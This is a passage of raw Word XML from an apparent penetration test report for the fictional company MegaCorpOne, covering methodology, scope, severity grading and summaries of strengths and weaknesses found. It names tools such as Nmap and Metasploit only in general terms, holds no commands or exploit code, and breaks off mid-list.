        <w:t xml:space="preserve">Reconnaissance </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KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> begins assessments by checking for any passive (open source) data that may assist the assessors with their tasks. If internal, the assessment team will perform active recon using tools such as Nmap and Bloodhound.</w:t>
      </w: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18" w:name="_3rdcrjn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Identification of Vulnerabilities and Se</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>rvices</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KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses custom, private, and public tools such as Metasploit, hashcat, and Nmap to gain perspective of the network security from a hacker’s point of view. These methods provide MegaCorpOne with an understanding of the risks that threaten its infor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">mation, and also the strengths and weaknesses of the current controls protecting those systems. The results were achieved by mapping the network architecture, identifying hosts and services, enumerating network and system-level vulnerabilities, attempting </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">to discover unexpected hosts within the environment, and eliminating false positives that might have arisen from scanning. </w:t>
      </w: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19" w:name="_26in1rg" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Vulnerability Exploitation</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KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">’s normal process is to both manually test each identified vulnerability and use automated tools to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit these issues. Exploitation of a vulnerability is defined as any action we perform that gives us unauthorized access to the system or the sensitive data. </w:t>
      </w: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20" w:name="_lnxbz9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Reporting</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 xml:space="preserve">Once exploitation is completed and the assessors have completed their objectives, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>or have done everything possible within the allotted time, the assessment team writes the report, which is the final deliverable to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_35nkun2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_bps7rkmnzfa0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</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Prior to any assessment activities, MegaCorpOne and the assessment team will identify targeted systems with a defined range or list of network IP addresses. The assessment team will work directly with the MegaCorpOne POC to determine which network ranges a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re in-scope for the scheduled assessment. </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It is MegaCorpOne’s responsibility to ensure that IP addresses identified as in-scope are actually controlled by MegaCorpOne and are hosted in MegaCorpOne-owned facilities (i.e., are not hosted by an external org</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">anization). In-scope and excluded IP addresses and ranges are listed below. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>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8310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFD7DF"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>IP Address/URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFD7DF"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="809"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>172.16.117.0/16</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MCO.local</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>*.Megacorpone.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MegaCorpOne internal domain, range and public website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_20t06yctl7p2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_i1ttjgrfjmli" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_2jxsxqh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_z337ya" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Grading Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Each finding was classified according to its severity, reflecting the risk each such vulnerability may pose to the business processes implemented by the application, based on the following criteria:</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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Immediate threat to key </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>business processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF9900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Indirect threat to key business processes/threat to secondary business processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Indirect or partial threat to business processes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> No direct threat exists; vulnerability may be leveraged with other vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="B5B5B5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Informational</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:    No threat; however, it is data that may be used in a future attack.</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 xml:space="preserve">As the following grid shows, each threat is assessed in terms of both its potential </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>impact on the business and the likelihood of exploitation:</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noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3545840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="image3.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with medium confidence"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3545840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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88310F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_3j2qqm3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_4b9zdqw12mdt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Summary of Strengths</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While the assessment team was successful in finding several vulnerabilities, the team also recognized several strengths within MegaCorpOne’s environment. These positives</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> highlight the effective countermeasures and defenses that successfully prevented, detected, or denied an attack technique or tactic from occurring. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTPS: shows it is secured</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>977 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Individual users with own login information and email accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Encrypted passwords for the users that are in the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Unable to log into WINDC01 VM in Hyper-V with an employee’s credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Private VPN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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29" w:name="_1y810tw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Summary of Weaknesses</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KCT successfully found seve</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ral critical vulnerabilities that should be immediately addressed in order to prevent an adversary from compromising the network. These findings are not specific to a software version but are more general and systemic vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exposed user informa</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tion with Google Dorking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We were able to enumerate MegaCorpe’s Domain </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We found that the domain server info is accessible using OSINT tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
